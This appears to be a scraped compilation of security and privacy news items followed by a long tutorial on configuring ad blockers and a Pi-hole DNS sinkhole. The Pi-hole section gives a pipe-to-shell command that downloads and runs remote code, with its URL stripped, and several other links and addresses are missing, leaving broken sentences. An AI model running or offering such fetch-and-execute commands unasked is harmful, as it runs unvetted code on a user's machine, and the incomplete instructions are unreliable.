Breaking the Ice on DICE: scaling secure Internet of Things Identities

In this Spotlight Podcast, sponsored by Trusted Computing Group*, Dennis Mattoon of Microsoft Research gives us the low-down on DICE: the Device Identifier Composition Engine Architectures, which provide a means of solving a range of security and identity problems on low-cost, low-power IoT endpoints. Among them: establishing strong device...

Amazon’s Facial Recognition Wrongly Identifies 28 Lawmakers, ACLU Says

Representative John Lewis of Georgia and Representative Bobby L. Rush of Illinois are both Democrats, members of the Congressional Black Caucus and civil rights leaders. But facial recognition technology made by Amazon, which is being used by some police departments and other organizations, incorrectly matched the lawmakers with people who had been arrested for a crime, the American Civil Liberties Union reported on Thursday morning. From a report: The errors emerged as part of a larger test in which the civil liberties group used Amazon's facial software to compare the photos of all federal lawmakers against a database of 25,000 publicly available mug shots. In the test, the Amazon technology incorrectly matched 28 members of Congress with people who had been arrested, amounting to a 5 percent error rate among legislators. The test disproportionally misidentified African-American and Latino members of Congress as the people in mug shots. "This test confirms that facial recognition is flawed, biased and dangerous," said Jacob Snow, a technology and civil liberties lawyer with the A.C.L.U. of Northern California. Nina Lindsey, an Amazon Web Services spokeswoman, said in a statement that the company's customers had used its facial recognition technology for various beneficial purposes, including preventing human trafficking and reuniting missing children with their families. She added that the A.C.L.U. had used the company's face-matching technology, called Amazon Rekognition, differently during its test than the company recommended for law enforcement customers.

Do we trust privacy technology too much?

The Internet has become absolutely vital to maintaining relationships in the modern world. As well as our social network of friends from across the globe, we also rely on a collection of apps and online services to stay in touch with our loved ones who we see every day.

This has some interesting implications on what we say online. We are very careful to regulate what we say, depending on the potential audience. We are unlikely to share our deepest secrets publicly on our Facebook timeline where anyone can see them for instance. But we may use a private Facebook Messenger chat session to discuss deeply personal issues with a trusted friend.

The illusion of privacy

Some apps – like Facebook Messenger and Snapchat – claim to offer enhanced privacy protections. Snapchat, for example, promises that messages sent using the app are automatically deleted after 10 seconds.

As a result, users are tempted to share more sensitive information than they would using a standard messaging app. But there is a problem.

Take Snapchat for example. Photos and messages really are deleted after 10 seconds – from the recipient’s phone. But that doesn’t mean that the picture is gone forever. By taking a screenshot, or using another app, the recipient can keep a copy of the picture – and you have no control at all over what they do with it.

The app may feel private, and the app developer may promise that your data is secure, but nothing can completely protect your privacy. This is the “illusion of privacy” and it can cause serious problems when you take these promises at face value.

Hiding and seeking online

Security experts call this desire for privacy online “hiding”. Many apps contain features specifically designed to help us hide – and all too often they overpromise on how protected we really are. For every “hiding” app, there is another designed for “seeking”, built to circumvent those safeguards and uncover the information we want to keep hidden.

Often it is the human factor that is the greatest threat to our privacy. The hiding technology works in principle, but it does not take into account what other people do, or their actions to expose us.

This is a serious problem because our trust in privacy technology can be used against us. If the system is secure and we trust it, we are more likely to share extremely sensitive information using it. When this trust is broken by a seeking app used by an untrustworthy contact, the fall-out can be incredibly severe.

Taking a default position of mistrust

In order to better protect our privacy, we must each take greater responsibility for what we share online. Tech companies know that people are concerned about their privacy, and they make many bold statements about how they will protect us.

But the truth is none of these safeguards is foolproof. It may be that if you want to share an unpopular opinion or some personal photographs, social media apps and services are not the tools to use.

To learn more about protecting your privacy, download a free trial of Panda Dome today.

The post Do we trust privacy technology too much? appeared first on Panda Security Mediacenter.

Popular Android/iOS Apps & Extensions Collecting “Highly Personal” User data

By Waqas

In May this year, HackRead reported how an Israeli company Unimania was caught collecting personal, Facebook and browsing data of users through Android apps and Chrome extensions. Now, researchers have discovered another “spyware” campaign aiming at stealing personal data of users but this time it is far bigger than the one previously reported. Ad-blockers and security […]

Smashing Security #088: PayPal’s Venmo app even makes your drug purchases public

Websites still using HTTP are marked as “not secure” by Chrome, 85,000 Google employees haven’t been phished for a year, and if you’re buying drugs via PayPal’s Venmo app you should say goodbye to privacy.

All this and much much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Scott Helme.

Putin’s Soccer Ball for Trump Had Transmitter Chip, Logo Indicates

Russian President Vladimir Putin's gift of a soccer ball to U.S. President Donald Trump last week set off a chorus of warnings -- some of them only half in jest -- that the World Cup souvenir could be bugged. Republican Senator Lindsey Graham even tweeted, "I'd check the soccer ball for listening devices and never allow it in the White House." It turns out they weren't entirely wrong. From a report: Markings on the ball indicate that it contained a chip with a tiny antenna that transmits to nearby phones. But rather than a spy device, the chip is an advertised feature of the Adidas AG ball. Photographs from the news conference in Helsinki, where Putin handed the ball to Trump, show it bore a logo for a near-field communication tag. During manufacturing, the NFC chip is placed inside the ball under that logo, which resembles the icon for a WiFi signal, according to the Adidas website. The chip allows fans to access player videos, competitions and other content by bringing their mobile devices close to the ball. The feature is included in the 2018 FIFA World Cup match ball that's sold on the Adidas website for $165 (reduced to $83 in the past week).

Update your devices: New Bluetooth flaw lets attackers monitor traffic

By Waqas

The Bluetooth flaw also opens door to a man-in-the-middle attack. The IT security researchers at Israel Institute of Technology have discovered a critical security vulnerability in some implementations of the Bluetooth standard in which not all the parameters involved are appropriately validated by the cryptographic algorithm. If the vulnerability is exploited it can allow a remote attacker within the range of […]

Privacy pros gaining control of technology decision-making over IT

TrustArc and IAPP announced the results of new research that examined how privacy technology is bought and deployed to address privacy and data protection challenges. The survey of privacy professionals worldwide shows that privacy management technology usage is on the rise across all regions, and that privacy teams have significant influence on purchasing decisions for eight of the ten technology categories surveyed. “This global survey is critical in our efforts to better …

The post Privacy pros gaining control of technology decision-making over IT appeared first on Help Net Security.

Uber driver recorded passengers & live-streamed videos on Twitch

By Carolina

What is shocking about this incident is that what the Uber driver did was legal under Missouri law. Jason Gargac, an Uber and Lyft driver from St Louis Missouri, USA recorded and live-streamed his passengers’ activities on the video-sharing website Twitch, without their consent and knowledge. The videos displayed activities of passengers in the vehicle including personal conversations […]

Exposed: 157 GB of sensitive data from Tesla, GM, Toyota & others

By Waqas

The IT security researchers at cyber resilience firm Upguard discovered a massive trove of highly sensitive data publically available to be accessed by anyone. The data belonged to hundreds of automotive giants including Tesla, Ford, Toyota, GM, Fiat, ThyssenKrupp, and Volkswagen – Thanks to a publically exposed server owned by Level One Robotics, a Canadian firm providing industrial automation services. The data […]

Uber Bans Driver Who Secretly Livestreamed Hundreds of Passengers

Lauren Weinstein tipped us off to this story from Mashable: Hundreds of Uber and Lyft rides have been broadcast live on Twitch by driver Jason Gargac this year, St. Louis Post-Dispatch reported Saturday, all of them without the passengers' permission. Gargac, who goes by the name JustSmurf on Twitch, regularly records the interior of his car while working for Uber and Lyft with a camera in the front of the car, allowing viewers to see the faces of his passengers, illuminated by his (usually) purple lights, and hear everything they say. At no point does Gargac make passengers aware that they are being filmed or livestreamed. Due to Missouri's "one-party consent" law, in which only one party needs to agree to be recorded for it to be legal (in this case, Gargac is the consenting one), what Gargac is doing is perfectly legal. That doesn't mean it's not 100 percent creepy. Sometimes, to confirm who they are for their driver, the passengers say their full names. Not only that, Gargac has another video that shows the view out the front of his car so that people can see where he's driving, giving away the locations of some passengers' homes. All the while, viewers on Twitch are commenting about things like the quality of neighborhoods, what the passengers are talking about, and of course, women's looks. Gargac himself is openly judgmental about the women he picks up, commenting to his viewers about their appearances before they get in his car and making remarks after he drops them off. He also regularly talks about wanting to get more "content," meaning interesting people, and is open about the fact that he doesn't want passengers to know they are on camera. "I feel violated. I'm embarrassed," one passenger told the St. Louis Post-Dispatch. "We got in an Uber at 2 a.m. to be safe, and then I find out that because of that, everything I said in that car is online and people are watching me. It makes me sick." 
The offending driver announced today on Twitter that he's at least "getting rid of the stored vids." He calls this move "step #1 of trying to calm everyone down." Hours ago his Twitch feed was made inaccessible. Lyft and Twitch have not yet responded to Mashable's request for a comment. But Uber said they've (temporarily?) banned Gargac from accessing their app "while we evaluate his partnership with Uber."

Read more of this story at Slashdot.

Data breach: Millions of SingHealth users affected including Singapore’s PM

By Waqas

SingHealth, the largest health care institution in Singapore, has suffered a massive data breach affecting the records of over 1.5 million patients who visited SingHealth’s polyclinics and clinics between May 1, 2015, and July 4 this year. One of the victims of the breach is the Prime Minister of Singapore, Lee Hsien Loong, while prescription details of 160,000 patients including […]

Webroot Blog: Cyber News Rundown: Venmo Setting Airs Dirty Laundry

Venmo’s Public Data Setting Shows All

Researchers recently uncovered just how much data is available through the Venmo API, successfully tracking routines, high-volume transactions from vendors, and even monitoring relationships. Because Venmo’s privacy settings are set to public by default, many users have unknowingly contributed to the immense collection of user data available for all to view. In addition to purchases, users can also leave a personalized note for the transaction, some of which range from drug references to more intimate allusions.

Spanish Telecom Suffers Major Data Breach

One of the world’s largest telecom providers fell victim to a data breach this week that could affect millions of Movistar customers. The breach allowed current customers to access the account of any other customer, simply by altering the alpha-numeric ID contained within the account URL. While parent company Telefonica was quick to resolve the issue, the communications giant could be forced to pay a fine upwards of 10 million EUR for not complying with new GDPR rules.

DDoS Attacks Target Gaming Publisher

Yesterday, Ubisoft announced via Twitter that they were in the process of mitigating a DDoS attack affecting many of their online gaming servers. At least three of Ubisoft’s largest titles were affected, leaving thousands of players unable to connect to online services. While Ubisoft has likely resumed normal activity, they are not the only gaming publisher to be the focus of these types of attacks. Blizzard Entertainment suffered a similar attack as recently as last week.

ProCare Health Under Fire for Patient Info Database

At least four companies handling the IT needs of the healthcare system in New Zealand have come forward to disclose an extremely large database containing personally identifiable information (PII) for more than 800,000 patients. Most of these records were gathered without consent from the patients, as the company has no direct dealings with them, but instead works with doctors to accumulate more data. Having such a large volume of data in one place is risky, and whether the security measures match the value of the data itself is still under scrutiny.

South Korea No Longer Main Target of Magniber Ransomware

Over the past few weeks, researchers have noticed a significant trend: the Magniber ransomware variant is branching out from its long-time focus on South Korea to other Asian countries. Additionally, its source code has been vastly improved, and it has begun using an older Internet Explorer exploit that allows Magniber to increase infection rates across unpatched systems.

The post Cyber News Rundown: Venmo Setting Airs Dirty Laundry appeared first on Webroot Blog.

How to block ads like a pro

In part one of this series, we had a look at a few reasons why you should be blocking online advertisements on your network and devices. From malvertising attacks and privacy-invading tracking systems to just being an outright annoyance, online ads and trackers are a nuisance that provides an attack vector for malware authors, compromises user security, and plainly diminishes the browsing experience.

In the second part of this series, we’ll cover a few of the common ad blocking utilities and how to best configure those tools for maximum effectiveness. We’ll take a look at tools that are easy enough to set up and run on mom’s computer, as well as a few tools that may require a bit more expertise. And later on, we’ll discuss a few tools that do a great job of blocking ads and protecting your privacy, but may require a shift in mindset before realizing the benefit. 

So, go grab your cup of Joe, sit back, and dive into the conclusion of “Everybody and their mother is blocking ads, so why aren’t you?”

A note about filter lists

You’ve read the reasons why it’s important to have a robust ad blocking policy on your network. You understand the risks that are posed by malvertising attacks and data-sucking exchange networks. You now want to configure ad blocking within your own network—but where do you start? Your first stop is to look at filter lists.

Several of the tools we’ll cover use sets of rules, known as filter lists, to help determine what should be blocked. These lists are created by individuals, open-source communities, and private organizations. Popular websites to obtain filter lists include the Adblock Plus subscription page and

Some filter lists include specific, narrow qualifiers such as “coin miners,” while others comprise large subsets of data targeting multiple facets of advertising and tracking. Filter lists are also broken out by language to help block ads in various regions.

When the browser requests a website, that site, and all the domains requested by that site, are checked against the filter lists prior to being displayed. If a domain is on a filter list, the ad blocker won’t allow the information through, effectively blocking the content. But too many filter lists result in too many look-ups, slowing the browser and increasing the response times of websites. Users should be mindful when adding filter lists not to add more than is required, and not to add duplicate lists.
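The look-up described above amounts to a set-membership test. A toy Python model (all list names and domains are made up) shows both the check and why merged lists keep look-ups cheap:

```python
# Toy model of how an ad blocker consults its filter lists: every domain a
# page requests is checked against a merged set of blocked domains.
FILTER_LISTS = {
    "easylist": {"ads.example.net", "tracker.example.org"},
    "social":   {"social-buttons.example.com"},
}

blocked = set().union(*FILTER_LISTS.values())   # merge once, look up in O(1)

def allowed(requested_domains):
    """Return only the requests the blocker lets through."""
    return [d for d in requested_domains if d not in blocked]

page_requests = ["cdn.example.com", "ads.example.net", "social-buttons.example.com"]
print(allowed(page_requests))   # ['cdn.example.com']
```

Because the lists are merged into a single set, each request costs one look-up; a duplicate list adds nothing but the time spent merging, while every extra distinct list grows the set the browser must maintain.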

Adblock Plus

The popular ad blocking extension made by Eyeo is the simplest and most popular of the tools we’ll cover, and it’s easy to see why. Adblock Plus has been blocking pop-ups, banner advertisements, and trackers for the last 12 years. The browser extension works in popular browsers, including Chromium-based browsers, Firefox, and Safari, and is easily configured to block a variety of threats. Adblock Plus runs with minimal interruption on PCs (and yes, this is actually configured on my mom’s PC). The company even has its own Adblock Plus browser that can be used on mobile devices (more on this later).

Though Adblock Plus works out-of-the-box without any other configurations needed, it’s best to dive into the settings to make a few adjustments.


After using one of the previous links to install Adblock Plus in your preferred browser, open the options menu by clicking the red ABP icon at the top of the browser, then click the Options button at the bottom of the window.

Adblock Plus encourages publishers to join their Acceptable Ads program. The Acceptable Ads program allows publishers who adhere to a prescribed set of guidelines an opportunity to have their ads shown to users who are using Adblock Plus. While this feature has caused a bit of flak for the company, the subsequent creation of the Acceptable Ads Committee has helped create a dialogue surrounding responsible advertising.

While those things are fine and dandy for publishers, we’re looking to block advertisements, so let’s disable those “acceptable” ads.

Set up

From within the General tab of the Settings window, uncheck the option for Allow Acceptable Ads. This will also be a good time to enable the Privacy and Security settings for Block additional tracking and Block social media icons tracking. Both settings will help prevent trackers from harvesting information about your browsing session (since social media buttons are used to track user behavior).

The default filter lists are shown under the Advanced tab. Adblock Plus comes pre-loaded with several popular lists, including EasyList and Fanboy’s Social Blocking List. Additional filters can be downloaded and installed from the Adblock Plus subscription page, but the default lists strike a reasonable balance between function and convenience, providing a modest ad blocking experience.


That’s it! Just a few clicks are all that is required to get a baseline setup of Adblock Plus. Let’s test it out and see how it looks.

That’s pretty cool, huh? The advertisements in videos, articles, and search results are all removed. And because the ad content isn’t being displayed, the page responds faster and the desired content is condensed into a smaller portion of the page, reducing the time spent scrolling around.

Sometimes it doesn’t work

Though Adblock Plus works great to block ads on most websites, sometimes it may not. Ads may find their way onto the page, or notices may appear advising you to disable the ad blocker.

Should the need arise, Adblock Plus is easy to disable: simply click the ABP logo, then click the check mark to toggle the service off and on.

But this post is about blocking ads, not succumbing to the pressures of aggressive advertisers. And though it may be possible to configure Adblock Plus to block the majority of these ads and trackers, advanced users may prefer a solution that allows more granularity and greater control over individual page elements and frames.

uBlock Origin

uBlock Origin, which is not to be confused with µBlock, is another browser-based plugin, available for both Chromium and Mozilla browsers. Like Adblock Plus, the product is widely popular and utilizes a variety of filter lists to help block advertisements and trackers. Unlike Adblock Plus, however, uBlock Origin is an open-source project, which helps boost the product’s popularity and keeps the project free from the outside influence of advertisers and publishers.

Though uBlock Origin works well at its intended purpose, the product may not suit all users due to its technical nature and a user interface (UI) that can be difficult to navigate. Some administrators have complained about an increase in support cases from users who don’t understand why their webpages no longer look the same. But for those who understand the advertising landscape and the trouble that blocking ads can cause, uBlock Origin is a preferred choice.


Installing uBlock Origin is an almost identical process to installing Adblock Plus. Just head over to the Mozilla Add-ons page, Chrome Web Store, or Safari extensions page to grab a free copy of the software, and click the buttons to install the extension.

After installing uBlock Origin, a red icon will appear in the top right of the browser window. Options can be configured from this icon. Though uBlock Origin works well in the default state, we’ll take a look at the settings and configurations and make a few changes to help block some of the previously missed elements.

Set up

Clicking the uBlock Origin icon will open the panel window. The big blue button can be used to easily turn uBlock Origin off and on. The settings icon looks like a slider bar and will open the settings dashboard.


After opening the uBlock Origin dashboard, users are presented with a window with various tabs. There aren’t any configuration changes required, and the only setting worth noting is I am an advanced user, which will be discussed later.

One area where uBlock Origin stands out above the competition is its inclusion of various filter lists. These lists can be enabled and disabled as necessary, providing a quick mechanism for blocking not only ads and trackers but also malware, scam sites, and other annoying website elements. Though the defaults are pretty good, we’re going to add a few more lists to improve the blocking capabilities.

In addition to the default lists, the following lists will also be enabled:

  • uBlock filters – Annoyances
  • Adblock Warning Removal List
  • Malvertising filter list by Disconnect
  • Spam404
  • Fanboy’s Annoyance List
  • Fanboy’s Social Blocking List
  • hpHosts Ad and tracking servers

Once all are enabled, click the Apply changes button to save the settings, and then the Update now button to update the lists.


uBlock Origin is configured to use many of the same filter lists as Adblock Plus, so many of the same ads will be blocked as before. The additional filter lists will help exclude some of the web elements that previously remained.

More difficult

Even with strict filtering, not all advertisements will be blocked. Some videos still auto-play, and some advertisements are hosted on the visited site itself rather than served by a known third-party advertiser. For these types of ads, it’s best to create custom rules to block the individual elements on the page.

Right-click the advertisement—or section of the page where the ad appears—and choose the block option. A window will appear allowing the rule to be previewed before creation. Click the create button, and the only thing we’re left watching is that video disappear!

Elements can also be blocked by clicking the uBlock Origin icon and using element zapper or element picker. The difference between these two is that the element zapper is temporary and only removes the element until the session is closed. Element picker adds the element code to the block list so that it will also be blocked on future visits.

This feature can be used to remove the empty element that remains on the previously examined page. Simply open uBlock Origin and click the Element Picker icon. Carefully select only the desired area of the page to be blocked. Be sure to use the preview option prior to creating the rule to ensure the block works as intended. After verifying, create the rule to remove the desired frame.
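Under the hood, the element picker generates a cosmetic filter: a rule that pairs a hostname with a CSS selector. Two illustrative examples are shown below, with a hypothetical site and selector names:

```
! Hide any element with the class "sidebar-ad" on example.com:
example.com##.sidebar-ad
! Hide the element whose id is "video-overlay" on the same site:
example.com###video-overlay
```

Rules created with the picker land in the My filters tab of the dashboard, where they can be reviewed or removed later.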


There is nothing worse than opening a bunch of tabs only to later find one of them playing video from a small screen sequestered to the corner of a window. Sure, these elements can be blocked on an individual basis, but technically savvy users may desire a blanket approach to prevention. For that, uBlock Origin offers script blocking.

uBlock Origin logs all script activity on a webpage for analysis. Looking at the information helps reveal the number of trackers and ad networks in use on a particular website.

To use the logger feature, open the uBlock Origin panel and click the Logger icon. The logger window will appear. Press the refresh button to start the logger and reload the page. Information about the website will be logged to the window.

Blocking web scripts tends to leave some websites lacking functionality, or just plain unusable. Script blocking should be reserved for those who understand the complications to expect. This problematic nature prompted uBlock Origin to hide the feature behind a setting titled I am an advanced user. To gain full access to the settings, users must click the link for the required reading.

After enabling the setting and reading the document, new options will appear within the uBlock Origin dashboard. The new options give users the ability to block first- and third-party scripts, as well as set individual policies per website.

Group settings based off script source will be displayed on top (red section), while the websites being called will appear below (blue section).

The two columns to the right of the names are used to define global (left) and local (right) policies. The combination of the two columns allows for a varying mixture of blocking capabilities.

For example, uBlock Origin can be configured to block all third-party scripts and frames, but first-party scripts will be blocked ONLY on the local site, since blocking first-party scripts globally will lead to problems loading webpages elsewhere.
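In uBlock Origin’s My rules tab, that policy corresponds to dynamic filtering rules of roughly the following form. Here example.com stands in for the local site, and the exact stored form may vary by version:

```
* * 3p-script block
* * 3p-frame block
example.com example.com 1p-script block
```

Each rule reads left to right as source hostname, destination hostname, request type, and action, with * acting as the global wildcard.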

Changes can be previewed by clicking the refresh circle. After verifying the changes, save the settings by clicking the lock icon at the top of the screen.

The resulting effect is that the auto-playing news story has now disappeared from all webpages on this site.

Not only did this stop the video, but if we go back and look at the logger, we see that all of the third-party scripts that were previously allowed are now being blocked.

Blocking scripts is one of the most effective mechanisms for blocking ads and invisible trackers, but it can lead to unintended results. Those who are interested in experimenting with script blocking—and who find the uBlock Origin UI intimidating—may find solace in the simplicity of the next plugin on our list.

A note about scripts

Website scripts come in a variety of forms, including JavaScript, Java, and Flash. These technologies are used for advertising and tracking, but also to make the internet function.

Videos and graphics may be produced with scripting code. Webpage content may also be generated using these languages. Comment sections and other social media content are produced with scripting languages. As a result, users should expect the following:

Blocking scripts by default WILL cause some websites to fail.

Blocking scripts by default WILL prevent some content from loading.

Users who decide to implement global script-blocking policies will need to be aware of the potential issues and how to resolve such issues when they occur. Having an understanding of the domain landscapes and being able to analyze the necessary domains to enable desired content will also be needed. Simply whitelisting all websites will negate the value of blocking scripts, so understanding the how-to and why is important.

NoScript Security Suite

NoScript is a browser-based plugin for Mozilla browsers only. Chromium users have an alternative called ScriptSafe, and Safari users have JS Blocker. Both work similarly.

NoScript provides an extra layer of protection by ensuring that scripting code such as Java, JavaScript, and Flash is only executed by trusted websites. Blocking scripting languages from running on untrusted websites will prevent ads, trackers, and other forms of undesirable activity from occurring.

In addition to blocking scripts, NoScript comes with a robust set of anti-cross-site-scripting (XSS) and clickjacking protections to help prevent malicious actions and undesirable redirects.

NoScript and other script blockers are recommended for advanced users who understand the risks.


The process is no different for NoScript than any other plugin. Jump over to the Mozilla Add-ons page and install the extension to the browser.

NoScript requires absolutely no setup and will begin working immediately after being installed. Unlike the other extensions we’ve covered, there is no way to disable NoScript. If users need to disable the plugin, it must be done through the Mozilla add-on configuration panel.

Using NoScript

Users may immediately notice a difference to their browsing experience after installing NoScript. Videos and gifs may not load correctly, content may not appear, or worse, pages may fail to load altogether. Though this sounds terrible, it’s easy to configure NoScript to your personal browsing needs.

The simple NoScript interface makes it easy to create exclusions and allow blocked content on either a temporary or permanent basis. Instead of settings and filter lists, NoScript simply uses a series of easy-to-understand buttons to control the content.

After NoScript has blocked content on a page, a numbered indicator will be shown on the NoScript icon. Click the icon to view the blocked domains.

This image shows elements being blocked on two domains. One of those would be a desired website; the other would be an ad network. Clicking the Trusted icon next to the desired website will allow scripts to run ONLY from that domain. Click the green refresh circle at the top to reload the page.

After allowing the root domain the privilege of running scripts, the website functionality may still be lacking. Additional domains may be shown after allowing the root domain, and some may need to be allowed before the content appears.

NoScript allows for temporarily allowing script execution from unknown domains. Simply click the Temp Trusted icon to allow code execution until the current session expires. Unfortunately, it may be a bit of trial-and-error to find the domain to allow before seeing the desired content.

Though not designated as an ad blocker, NoScript will block advertisements injected via third-party scripts. NoScript won’t remove the empty elements from the page, so a tool like uBlock Origin will still be required to de-clutter the page landscape.

NoScript comes with a list of already assigned permissions, but the list is not extensive. Users will need to configure the program for the websites they most frequent. If the desired website makes heavy use of third-party scripts and content, it will be necessary to individually allow all content-providing domains for the website to function as intended. Some websites make extensive use of outside content, so users may spend considerable time configuring permissions before streamlining the experience.

NoScript is a valuable tool in any security toolkit. Blocking scripts is an effective way to block malicious activity and unwanted content.  Users may have to overcome the steep configuration curve before recognizing the benefit of the tool, but those who do will be rewarded with a faster browsing experience and fewer online trackers compromising their online privacy.

A note about browsers

Browsers are the key to a successful ad blocking experience. Some browsers support ad blocking extensions, whereas others do not. This post has focused on ad blocking using the Mozilla Firefox browser. Though this is subjective, Firefox provides a better all-around ad blocking experience across platforms. In fact, our own extension blocks malicious sites and unwanted content on Firefox only. By using the same browser and plugins across machines, configurations and personal filter lists can be shared across devices. This reduces per-machine configuration time and produces a similar web experience—regardless of device.

Though Google Chrome is an extremely popular browser, keep in mind that it is distributed freely by a company that makes a substantial portion of its annual revenue from advertising.

According to Statista, Google netted $95.38 billion, or roughly 87 percent of its total revenue, through advertising. Not only does the company sell ad space on its network, it also collects information about your browsing activity in order to give “contextually relevant suggestions” (a fancy way to say ads).

The Google Chrome Privacy Whitepaper and Chrome Privacy Policy provide plenty of information on Chrome’s collection capabilities and are an eye-opening read for those concerned about data mining. Some concerning items are shown below, with highlighting added for clarity.

The United States Congress has also become interested in Internet tracking and has recently requested responses from both Google and Apple on user tracking practices.

Yes, other browsers will track your behavior, but the extent is reduced when using an open-source browser without an advertising agenda. Those who are interested in an open-source browser but partial to the look and feel of Google Chrome may want to experiment with the Chromium browser. Chromium is the open-source project behind Chrome and Opera, and functions almost identically to both—save for all the Google modifications.

Block ads on Android

After using an ad-blocking browser on mobile, returning to an ad-laced mobile internet is more than a diminished user experience—it’s downright dreadful.

The mobile landscape is already limited in size by its design, yet publishers and website owners feel it necessary to inundate the screen with irrelevant content and banner ads. This renders the content from the main site barely viewable and forces many users to fumble through troublesome mechanisms simply to read an article.

Some may contend that it’s best to not click on the ads, but a better approach may simply be to get rid of the ads altogether. This will not only declutter the screen and remove the undesirable content, but also improve page response times and lessen the attack surface against devices.

As we’ve seen throughout this write-up, browser extensions have been key to a successful ad blocking experience—and mobile is no different.

All of the tools covered in this post are available on mobile devices. But due to restrictions in Google Chrome on Android, users of that browser will be unable to set up the necessary configurations.

Thus, users who wish to block ads on their Android device will be forced to look to other browsers to accomplish the goal.

One simple solution that even dear old Mom will be able to use is the Adblock Plus browser. This Firefox-based browser is built by the same team that produces the Adblock Plus extension and incorporates all of the blocking capabilities in a pre-packaged browser that is configured for a modest ad blocking experience.

Users wanting more control over the various elements and frames may wish to consider the jump over to Mozilla where all of the plugins and configurations that were discussed in this write-up can be used to block the ads and declutter the screen. Those who opt for the change will see that dreadful mobile experience replaced with an ad-free view of how the page was originally intended to appear.

Mobile browser plugins perform exactly like their desktop counterparts and will sufficiently block advertisements, trackers, and scripts on your mobile devices. Blocking this content not only improves the mobile web experience, but also helps conserve battery life, decreases data usage, improves website response times, and reduces the attack surface for online threats.

But with the abundance of mobile devices, setting up policies on individual devices may not be the most efficient way to block advertisements. If there are a number of devices under your control, what would be the most efficient manner to block ads across them? For this, the final tool on our list will fill the void.


Administrators of small businesses or moderate home networks who wish to engage in ad blocking practices without the concern of operating systems, browsers, and plugins may wish to implement a free and (moderately) simple network-based solution. For that need, we have Pi-hole.

Pi-hole is a Linux-based, network-level advertising and tracker blocker that acts as a DNS sinkhole for blacklisted domains. This means that advertisements and trackers are blocked before making it into the network. This allows Pi-hole to block ads on not just computers and cell phones, but also smart TVs, third-party apps, and even streaming video services.
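The sinkhole idea itself is simple enough to sketch in a few lines of Python. This is a conceptual illustration only, not Pi-hole’s implementation (which also supports exact-match and regex lists); the blocklist entries are hypothetical, and the matching shown treats an entry as covering its subdomains, wildcard-style:

```python
# Conceptual sketch of a DNS sinkhole decision: a query is "sinkholed"
# (answered with a block response instead of being forwarded upstream)
# when the queried name, or any parent domain of it, is on the blocklist.

BLOCKLIST = {"tracker.example", "ads.example.net"}  # hypothetical entries

def is_sinkholed(domain: str, blocklist: set[str]) -> bool:
    labels = domain.lower().rstrip(".").split(".")
    # Check the name itself and every parent suffix:
    # "pixel.tracker.example" -> pixel.tracker.example, tracker.example, example
    return any(".".join(labels[i:]) in blocklist for i in range(len(labels)))
```

A resolver built around this check would return its own address (or NXDOMAIN) for sinkholed names and pass everything else to the upstream DNS provider.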

Like the other tools we’ve covered, Pi-hole uses filter lists to block undesirable content. The Pi-hole filter list is compiled from various third-party sources into a single list. As such, there will be overlap between the lists used by Pi-hole and those used by other ad blockers like uBlock Origin and Adblock Plus.
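That compilation step can be sketched as follows. This is an illustrative approximation of how several hosts-format sources might be merged and deduplicated into one list; real Pi-hole downloads its sources over HTTP and stores the result in its own database, whereas here the sources are inline strings with hypothetical domains:

```python
# Sketch: merge several hosts-format blocklist sources into one
# deduplicated, sorted list of domains.

def parse_hosts(text: str) -> set[str]:
    domains = set()
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # strip comments and whitespace
        if not line:
            continue
        parts = line.split()
        # Accept both " ads.example.com" and a bare "ads.example.com"
        domain = parts[1] if len(parts) > 1 else parts[0]
        domains.add(domain.lower())
    return domains

def compile_blocklist(sources: list[str]) -> list[str]:
    merged: set[str] = set()
    for text in sources:
        merged |= parse_hosts(text)  # set union removes overlap
    return sorted(merged)
```

Because the merge is a set union, domains that appear on multiple source lists are only stored once, which is why the overlap between lists costs nothing.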

Pi-hole has been designed to work seamlessly on single board computers, such as Raspberry Pi, but can just as easily function on other Linux machines or cloud-based implementations.

Although not all Pi-hole installations will be as pretty as the above setup, a dedicated Linux machine to act as the DNS server is a necessary requirement.

Set up

Once you have a device on which to run Pi-hole, setup is easy and straightforward. The command to install Pi-hole is as simple as:

curl -sSL | bash

Privacy-conscious users may wish to consider using the Cloudflare DNS for the upstream DNS provider. This privacy-focused DNS provider offers a fast and reliable lookup (except for the time it wasn’t). The address is:

After configuring your router DHCP options to force clients to use Pi-hole as the primary DNS server, setup will be complete.

The web-based panel can then be accessed by typing http://pi.hole/admin in your browser. The panel gives overall statistics regarding the number of blocked ads, the number of DNS queries, and percentages of blocked traffic. Custom whitelists and blacklists can be configured using the tabs on the left.


Now that it’s all set up, we can have a look to see how well Pi-hole blocks the content.

As you can see, Pi-hole does a good job of removing the ads from this page. None of the ads remain, and only a few web elements are left behind. Using the Block Element feature in uBlock Origin or Adblock Plus (not covered) will clear those unnecessary elements from the page.

And though Pi-hole works great to block ads at the network level and for all devices, users may still be required to configure per-device ad blocking in order to protect laptops and mobile devices when they’re not under the protection of the Pi-hole DNS sinkhole. Pain though this may be, Pi-hole makes an excellent addition to any ad blocking arsenal. The benefits of blocking ads throughout your environment and across streaming platforms outweigh the duplicated effort involved.

A final note

In preparation for this article, I spoke with a number of friends and colleagues regarding their ad blocking preferences. Despite the fact that we are all in security and all read and share the same information, few of us block (or view) online advertisements and trackers the same way.

What I’ve come to realize is ad blocking is often reflective of one’s personal experiences and perception of online threats. The level to which a person is willing to go to maintain personal security can depend on the level of tolerance and compromise that person is willing to extend in exchange for the belief that their activities are secure.

Case in point: Some colleagues block advertisements from third-party advertisers due to security concerns, but those same people may allow suggestions from their search provider on the notion that ads from reputable vendors don’t pose the same risk. Others may be adamant about blocking ads on their network as to not compromise proprietary information, but will tolerate ads on their mobile device as to not interfere with mobile browsing functionality.

A few take a hard-line approach and block as much as possible, which can render websites inoperable, while a majority are willing to compromise in exchange for a more user-friendly experience.

Though this article takes the position that all advertisements should be blocked, not everyone will agree. Some see the benefit in online advertising. Others may agree about blocking advertising content, but disagree with the methodology used in this post.

In a nutshell, there is no right or wrong way to block advertisements and trackers, and there seems to be little consensus regarding the most effective manner in which to do so.

Therefore, those wishing to configure an ad blocking policy within their environment will be encouraged to experiment with various products and methods to find what works best for their needs.

Block ads like a pro!

You’ve read this post and are hopefully coming away with the knowledge of why it’s important to block ads and the tools necessary to do so. But how should you set up your own network?

Of course, I can’t tell you that. You’ll have to come up with the system that best fits your needs, environment, and patience levels. But what I can tell you is how my personal setup is configured.

Desktop

  • Default Browser: Mozilla Firefox with ad blocking protections
